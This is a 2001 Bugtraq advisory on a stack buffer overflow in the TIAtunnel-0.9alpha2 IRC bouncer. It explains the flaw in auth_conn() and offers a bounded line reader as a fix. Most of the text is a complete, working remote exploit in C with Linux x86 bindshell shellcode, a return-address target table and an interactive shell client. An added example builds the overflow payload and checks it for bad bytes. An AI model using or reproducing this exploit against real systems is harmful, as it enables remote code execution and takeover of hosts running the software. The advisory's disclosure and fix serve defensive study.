[20891] in bugtraq


Buffer Overflow in TIAtunnel-0.9alpha2

daemon@ATHENA.MIT.EDU (qitest1)
Wed Jun 6 13:05:35 2001

Date: Wed, 6 Jun 2001 15:45:55 +0200 (CEST)
From: qitest1 <qitest1@cercaband.com>
To: bugtraq@securityfocus.com
Message-ID: <Pine.LNX.4.21.0106061541000.1049-200000@localhost.localdomain>

  /* qitest1's security advisory #001 */
  
  Buffer Overflow in TIAtunnel-0.9alpha2  
  
+Systems Affected
  Any system running TIAtunnel-0.9alpha2

+Program Description
  TIAtunnel is a simple IRC bouncer that allows access from a simple
  IPv4 box to any kind of well-known server. It has been written by
  tHE rECIdjVO <recidjvo@pkcrew.org>, http://tiatunnel.pkcrew.org/.

+Vulnerability And Impact
  A remote attacker can overflow a stack buffer and execute arbitrary code
  on the system with the privileges of the user running TIAtunnel. The
  overflow is in auth_conn(), while it reads the client's authentication
  line. In fact, in auth.c at line 28 we have:
  struct tunnel *auth_conn(int *csock, int entries)
    {
        char authline[512];                     /* static char buf */
        struct tunnel *t_current;
        int i = 0;

        // Read one line from the client
        bzero(authline, 512);
        while((authline[i - 1] != '\n') && (authline[i - 1] != '\r') && 
        (i < 1024)) {                           /* 1024?! =) */
                read(*csock, (authline + i++), (size_t)1);
        }
        /* ... (rest of auth_conn() not quoted in this advisory) */
  authline holds 512 bytes, but the loop keeps reading one byte at a time
  until it sees '\n' or '\r' or until i reaches 1024. A line of more than
  512 bytes with no CR or LF in it is therefore written past the end of
  authline, over the saved frame pointer and the return address of
  auth_conn(); on the RedHat 6.2 build the attached exploit targets, the
  saved return address is 516 bytes into the line (RETPOS in the exploit).
  Note also that on the first iteration i is 0, so the loop condition
  reads authline[-1], one byte before the buffer.
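  As an added illustration, not part of this advisory or of TIAtunnel, here
  is the same line reader with the loop bounded by the buffer instead of by
  the constant 1024, and with an overlong line refused rather than silently
  truncated. The function names, the pipe-based harness and the sample
  lines are assumptions made for the demonstration.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define AUTHLINE_MAX 512        /* same size as authline[] in auth_conn() */

/* Read one CR- or LF-terminated line from fd into buf[bufsz].
 * The bound is the buffer size, not a constant: the original compared i
 * against 1024 while authline held 512 bytes, and tested authline[i - 1]
 * before any byte had been read.
 * Returns the line length without the terminator, -1 on EOF or error
 * before a terminator, or -2 if the line would not fit (refuse it: a
 * caller must not authenticate on a partial line). */
ssize_t read_auth_line(int fd, char *buf, size_t bufsz)
{
    size_t i = 0;
    char c;
    ssize_t n;

    if (bufsz == 0)
        return -1;
    for (;;) {
        n = read(fd, &c, 1);
        if (n < 0 && errno == EINTR)
            continue;
        if (n <= 0)
            break;                          /* EOF or I/O error */
        if (c == '\n' || c == '\r') {
            buf[i] = '\0';
            return (ssize_t)i;
        }
        if (i == bufsz - 1) {               /* only the NUL slot is left */
            buf[i] = '\0';
            return -2;
        }
        buf[i++] = c;
    }
    buf[i] = '\0';
    return -1;
}

char authline[AUTHLINE_MAX];    /* stand-in for auth_conn()'s buffer */

/* Demo harness (constructed input): a client line of `count` copies of
 * `fill`, terminated by `term` (0 = no terminator at all), pushed through
 * a pipe so the reader sees it byte by byte as it would from a socket. */
ssize_t feed_line(char fill, size_t count, char term)
{
    char input[2048];
    int fds[2];
    size_t len;
    ssize_t w, r;

    if (count + 1 > sizeof(input) || pipe(fds) != 0)
        return -99;
    memset(input, fill, count);
    len = count;
    if (term)
        input[len++] = term;
    w = write(fds[1], input, len);
    close(fds[1]);                          /* reader sees EOF after the data */
    r = (w == (ssize_t)len) ? read_auth_line(fds[0], authline, sizeof(authline)) : -99;
    close(fds[0]);
    return r;
}

int main(void)
{
    printf("12-byte line: %zd\n", feed_line('A', 12, '\n'));
    printf("1000-byte line: %zd (-2 = refused)\n", feed_line('A', 1000, '\n'));
    return 0;
}
```

  A 511-byte line still fits (512 bytes with the terminating NUL); the
  512th byte of a line is where the original started writing over the
  rest of the frame, and is where this version stops and returns -2.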

+Solution
  The author has been contacted. Upgrade your version of TIAtunnel.

+Exploit
  This bug can be successfully exploited by a remote attacker. A
  demonstration exploit (tiatunnel.c) is attached to this advisory. See
  the code for more information.

-- 
/* qitest1		http://qitest1.cjb.net *
 *    ``Ut tensio, sic vis. 69 tecum sis.''    *
 * main(){if(unsatisfied == 69) try_come(in);} */

Attachment: tiatunnel.c (the base64 MIME part, decoded; the missing
includes were added, -t/-o are now applied (the original added
atoi(argv[1]) to target[0]), the return address is written as 4 bytes
so the file also builds on a 64-bit host, and shellami() no longer reads
1024 bytes into a 1024-byte buffer)

/*
 *  TIAtunnel-0.9alpha2 Linux x86 remote exploit
 *  by qitest1 - 5/06/2001
 *
 *  Shellcode is executed with the privileges of the program. I
 *  noticed that with a simple execve() a shell was executed but its
 *  IO was linked with the term where TIAtunnel was launched. This
 *  is not a problem for us if we use a bindshell code.
 *
 *  Greets: recidjvo->Tnx for this bug. And now you can really smile.
 *          Nail    ->Dear friend ;)
 *  Hmm.. 0x69 seems to strike again..
 */

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <netdb.h>

/* authline[512] followed by the 4-byte saved frame pointer: the saved
 * return address of auth_conn() is 516 bytes into the line. */
#define RETPOS          516

struct targ {
    int         def;
    char        *descr;
    uint32_t    retaddr;        /* 32-bit target, always written as 4 bytes */
};

struct targ target[] = {
    {0, "RedHat 6.2 with TIAtunnel-0.9alpha2 from tar.gz", 0xbffff67c},
    {69, NULL, 0}               /* end of table */
};

/* Linux/x86 bindshell on TCP port 30464 (0x7700 in network order):
 * fork(), parent exits, child does socket(), bind(), listen(), accept(),
 * dup2() x3, execve("/bin/sh"). Contains no 0x00, 0x0a or 0x0d bytes:
 * the target's loop stops at \n or \r, and the line is sent with strlen(). */
char shellcode[] =
    "\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0"
    "\x31\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06"
    "\x89\x46\x08\xb0\x66\xb3\x01\xcd\x80\x89\x06\xb0\x02\x66\x89"
    "\x46\x0c\xb0\x77\x66\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31"
    "\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66\xb3\x02\xcd\x80"
    "\xeb\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04"
    "\xcd\x80\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd"
    "\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80"
    "\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f\x62\x69\x6e\x89\x06\xb8\x2f"
    "\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89"
    "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31"
    "\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5b\xff\xff\xff";

/* NOP sled | shellcode | return address | '\n' | NUL */
char mybuf[RETPOS + 4 + 1 + 1];

int     sockami(char *host, int port);
void    do_mybuf(uint32_t retaddr);
void    shellami(int sock);
void    usage(char *progname);

int main(int argc, char **argv)
{
    int      sel = 0, port = 0, offset = 0, sock, cnt, ntargets;
    char     *host = NULL;
    uint32_t retaddr;

    printf("\n  TIAtunnel-0.9alpha2 exploit by qitest1\n\n");

    if (argc == 1)
        usage(argv[0]);
    while ((cnt = getopt(argc, argv, "h:p:t:o:")) != -1) {
        switch (cnt) {
        case 'h':
            host = strdup(optarg);
            break;
        case 'p':
            port = atoi(optarg);
            break;
        case 't':
            sel = atoi(optarg);
            break;
        case 'o':
            offset = atoi(optarg);
            break;
        default:
            usage(argv[0]);
            break;
        }
    }
    if (host == NULL || port == 0)
        usage(argv[0]);

    /* -t must name an entry of the table (the original did not check) */
    for (ntargets = 0; target[ntargets].def != 69; ntargets++)
        ;
    if (sel < 0 || sel >= ntargets)
        usage(argv[0]);

    printf("+Host: %s\n  as: %s\n", host, target[sel].descr);
    printf("+Connecting to %s...\n", host);
    sock = sockami(host, port);
    printf("  connected\n");

    /* The original did target[0].retaddr += atoi(argv[1]); with getopt
     * argv[1] is "-h", so -t and -o were silently ignored. */
    retaddr = target[sel].retaddr + offset;
    printf("+Building buffer with retaddr: 0x%08x...\n", (unsigned)retaddr);
    do_mybuf(retaddr);
    strcat(mybuf, "\n");                /* ends the line for auth_conn()'s loop */
    printf("  done\n");
    send(sock, mybuf, strlen(mybuf), 0);
    printf("+Overflowing...\n");

    printf("+Zzing...\n");
    sleep(2);
    printf("+Getting shell...\n");
    sock = sockami(host, 30464);        /* port opened by the bindshell */
    shellami(sock);
    return 0;
}

int sockami(char *host, int port)
{
    struct sockaddr_in address;
    struct hostent *hp;
    int sock;

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock == -1) {
        perror("socket()");
        exit(-1);
    }

    hp = gethostbyname(host);
    if (hp == NULL) {
        perror("gethostbyname()");
        exit(-1);
    }

    memset(&address, 0, sizeof(address));
    memcpy(&address.sin_addr, hp->h_addr, hp->h_length);
    address.sin_family = AF_INET;
    address.sin_port = htons(port);

    if (connect(sock, (struct sockaddr *) &address, sizeof(address)) == -1) {
        perror("connect()");
        exit(-1);
    }

    return sock;
}

void do_mybuf(uint32_t retaddr)
{
    size_t sclen = strlen(shellcode);

    memset(mybuf, 0x90, sizeof(mybuf));                 /* NOP sled */
    memcpy(mybuf + RETPOS - sclen, shellcode, sclen);   /* shellcode ends at RETPOS */
    memcpy(mybuf + RETPOS, &retaddr, 4);                /* overwrites the saved EIP;
                                                           little-endian host assumed */
    mybuf[RETPOS + 4] = '\0';
}

void shellami(int sock)
{
    int     n;
    char    recvbuf[1024];
    char    *cmd = "id; uname -a\n";
    fd_set  rset;

    send(sock, cmd, strlen(cmd), 0);

    while (1) {
        FD_ZERO(&rset);
        FD_SET(sock, &rset);
        FD_SET(STDIN_FILENO, &rset);
        select(sock + 1, &rset, NULL, NULL, NULL);
        if (FD_ISSET(sock, &rset)) {
            /* one byte less than the buffer: the original read 1024 bytes
             * and then wrote recvbuf[1024] = 0 */
            n = read(sock, recvbuf, sizeof(recvbuf) - 1);
            if (n <= 0) {
                printf("Connection closed by foreign host.\n");
                exit(0);
            }
            recvbuf[n] = 0;
            printf("%s", recvbuf);
        }
        if (FD_ISSET(STDIN_FILENO, &rset)) {
            n = read(STDIN_FILENO, recvbuf, sizeof(recvbuf) - 1);
            if (n > 0) {
                recvbuf[n] = 0;
                write(sock, recvbuf, n);
            }
        }
    }
}

void usage(char *progname)
{
    int i = 0;

    printf("Usage: %s [options]\n", progname);
    printf("Options:\n"
           "  -h hostname\n"
           "  -p port\n"
           "  -t target\n"
           "  -o offset\n"
           "Available targets:\n");
    while (target[i].def != 69) {
        printf("  %d) %s\n", target[i].def, target[i].descr);
        i++;
    }

    exit(1);
}
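Added example, not part of qitest1's tiatunnel.c or of TIAtunnel: the
overflow line laid out the way do_mybuf() lays it out, plus a check for
the bytes this particular sink cannot carry. auth_conn()'s loop stops at
0x0a or 0x0d, and the exploit sends the line with strlen(), so a 0x00
also cuts it short; a return address such as 0xbffff60a could therefore
never reach the saved EIP. The six-byte stand-in shellcode (the fork()
prologue of the real one) and the function names are assumptions of this
example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define RETPOS      516                 /* authline[512] + saved EBP (4) */
#define PAYLOAD_MAX (RETPOS + 4 + 1)    /* sled+shellcode, ret, '\n' */

/* Bytes the line cannot carry: 0x0a/0x0d end auth_conn()'s read loop,
 * 0x00 ends the line on the attacker's side (send(..., strlen(mybuf), 0)). */
static int is_bad_byte(uint8_t b)
{
    return b == 0x00 || b == 0x0a || b == 0x0d;
}

/* Index of the first bad byte in buf[0..len), or -1 if there is none. */
long find_bad_byte(const uint8_t *buf, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (is_bad_byte(buf[i]))
            return (long)i;
    return -1;
}

/* Layout: NOP sled | shellcode ending at RETPOS | ret (little-endian) | '\n'.
 * Returns the payload length, -1 if the shellcode does not fit below the
 * return address, -2 if a bad byte would cut the line before its end. */
long build_payload(uint8_t *out, size_t outsz,
                   const uint8_t *sc, size_t sclen, uint32_t ret)
{
    if (outsz < PAYLOAD_MAX || sclen > RETPOS)
        return -1;
    memset(out, 0x90, RETPOS);
    memcpy(out + RETPOS - sclen, sc, sclen);
    out[RETPOS + 0] = (uint8_t)(ret);
    out[RETPOS + 1] = (uint8_t)(ret >> 8);
    out[RETPOS + 2] = (uint8_t)(ret >> 16);
    out[RETPOS + 3] = (uint8_t)(ret >> 24);
    out[RETPOS + 4] = '\n';
    if (find_bad_byte(out, RETPOS + 4) >= 0)
        return -2;
    return RETPOS + 5;
}

/* Constructed stand-in: the first six bytes of the page's shellcode
 * (xor eax,eax; mov al,2; int 0x80 = fork()). */
static const uint8_t sample_sc[] = { 0x31, 0xc0, 0xb0, 0x02, 0xcd, 0x80 };

uint8_t payload[PAYLOAD_MAX];

/* Build into the global buffer with the stand-in shellcode. */
long demo_build(uint32_t ret)
{
    return build_payload(payload, sizeof(payload),
                         sample_sc, sizeof(sample_sc), ret);
}

int main(void)
{
    /* the RedHat 6.2 address from the target table, then one that
     * contains a line terminator */
    uint32_t addrs[] = { 0xbffff67c, 0xbffff60a };
    for (size_t i = 0; i < 2; i++) {
        long len = demo_build(addrs[i]);
        printf("ret 0x%08x: %ld%s\n", (unsigned)addrs[i], len,
               len == -2 ? " (bad byte: line would be cut short)" : " bytes");
    }
    return 0;
}
```

The 521-byte result matches what tiatunnel.c sends: 516 bytes of sled and
shellcode, 4 bytes of return address, and the '\n' appended by strcat().
A -o offset that pushes the address onto a value with a 0x0a, 0x0d or 0x00
byte fails here before anything is sent, where the original would have
sent a truncated line.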
